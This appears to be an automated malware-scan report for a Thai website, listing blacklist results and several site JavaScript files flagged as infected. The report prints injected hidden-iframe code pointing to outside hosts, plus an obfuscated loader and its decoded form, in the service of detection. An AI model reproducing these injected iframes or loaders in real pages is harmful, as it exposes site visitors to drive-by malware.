Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ntctv.in.th
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ntctv.in.th/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://ntctv.in.th/ | 200 OK Content-Length: 4489 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { $("#various1").fancybox({ 'width' : '42%', 'height' : '62%', 'autoScale' : false, 'transitionIn' : 'none', 'transitionOut' : 'none', 'type' : 'iframe' }); $("#various2").fancybox({ 'width' : '42%', 'height' : '62%', 'autoScale' : false, 'transitionIn' : 'none', 'transitionOut' : 'none', 'type' : 'iframe' }); $("# }); $("#various5").fancybox({ 'width' : '42%', 'height' : '62%', 'autoScale' : false, 'transitionIn' : 'none', 'transitionOut' : 'none', 'type' : 'iframe' }); $("#various6").fancybox({ 'width' : '42%', 'height' : '62%', 'autoScale' : false, 'transitionIn' : 'none', 'transitionOut' : 'none', 'type' : 'iframe' }); }); Antivirus reports:
| ||
http://ntctv.in.th/fancybox/jquery.mousewheel-3.0.4.pack.js | 200 OK Content-Length: 1449 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=493720></iframe>'); (function(d){function g(a){var b=a||window.event,i=[].slice.call(arguments,1),c=0,h=0,e=0;a=d.event.fix(b);a.type="mousewheel";if(a.wheelDelta)c=a.wheelDelta/120;if(a.detail)c=-a.detail/3;e=c;if(b.axis!==undefined&&b.axis===b.HORIZONTAL_AXIS){e=0;h=-1*c}if(b.wheelDeltaY!==undefined)e=b.wheelDeltaY/120;if(b f.length;a;)this.addEventListener(f[--a],g,false);else this.onmousewheel=g},teardown:function(){if(this.removeEventListener)for(var a=f.length;a;)this.removeEventListener(f[--a],g,false);else this.onmousewheel=null}};d.fn.extend({mousewheel:function(a){return a?this.bind("mousewheel",a):this.trigger("mousewheel")},unmousewheel:function(a){return this.unbind("mousewheel",a)}})})(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://schiedsrichterge.bplaced.net/acwf.html?j=493720 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=493720> | ||
http://ntctv.in.th/fancybox/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 15794 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=493720></iframe>'); ;(function(b){var m,t,u,f,D,j,E,n,z,A,q=0,e={},o=[],p=0,d={},l=[],G=null,v=new Image,J=/\.(jpg|gif|png|bmp|jpeg)(.*)?$/i,W=/[^\.]\.(swf)\s*$/i,K,L=1,y=0,s="",r,i,h=false,B=b.extend(b("<div/>")[0],{prop:0}),M=b.browser.msie&&b.browser.version<7&&!window.XMLHttpRequest,N=function(){t.hide(); easingOut:"swing",showCloseButton:true,showNavArrows:true,enableEscapeButton:true,enableKeyboardNav:true,onStart:function(){},onCancel:function(){},onComplete:function(){},onCleanup:function(){},onClosed:function(){},onError:function(){}};b(document).ready(function(){b.fancybox.init()})})(jQuery); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://schiedsrichterge.bplaced.net/acwf.html?j=493720 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=493720> | ||
http://ntctv.in.th/fancybox/video.js | 200 OK Content-Length: 593 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=493720></iframe>'); jQuery(document).ready(function() { $(".video").click(function() { $.fancybox({ 'padding' : 0, 'autoScale' : false, 'transitionIn' : 'none', 'transitionOut' : 'none', 'title' : this.title, 'width' : 640, 'height' : 385, 'href' : this.href.replace(), 'type' : 'swf', 'swf' : { 'wmode' : 'transparent', 'allowfullscreen' : 'true' } }); return false; }); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://schiedsrichterge.bplaced.net/acwf.html?j=493720 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://schiedsrichterge.bplaced.net/acwf.html?j=493720> | ||
http://ntctv.in.th/js/jwplayer.js | 200 OK Content-Length: 155953 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{1-prototype;}catch(asd){x=2;}if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92,59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29,48,4,0,94,93,104,98,37,105,105, Decoded script: function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://miamiheattickets.com/http.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; Antivirus reports:
| ||
http://ntctv.in.th/index.php | 200 OK Content-Length: 4489 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { $("#various1").fancybox({ 'width' : '42%', 'height' : '62%', 'autoScale' : false, 'transitionIn' : 'none', 'transitionOut' : 'none', 'type' : 'iframe' }); $("#various2").fancybox({ 'width' : '42%', 'height' : '62%', 'autoScale' : false, 'transitionIn' : 'none', 'transitionOut' : 'none', 'type' : 'iframe' }); $("# }); $("#various5").fancybox({ 'width' : '42%', 'height' : '62%', 'autoScale' : false, 'transitionIn' : 'none', 'transitionOut' : 'none', 'type' : 'iframe' }); $("#various6").fancybox({ 'width' : '42%', 'height' : '62%', 'autoScale' : false, 'transitionIn' : 'none', 'transitionOut' : 'none', 'type' : 'iframe' }); }); Antivirus reports:
| ||
http://ntctv.in.th/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ntctv.in.th
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Aug 2014 05:53:28 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 4489
Content-Type: text/html
X-Powered-By: PHP/5.5.10
...4489 bytes of data.
GET / HTTP/1.1
Host: ntctv.in.th
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Aug 2014 05:53:28 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 4489
Content-Type: text/html
X-Powered-By: PHP/5.5.10
...4489 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ntctv.in.th
Referer: http://www.google.com/search?q=ntctv.in.th
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ntctv.in.th
Referer: http://www.google.com/search?q=ntctv.in.th
Result:
The result is similar to the first query. There are no suspicious redirects found.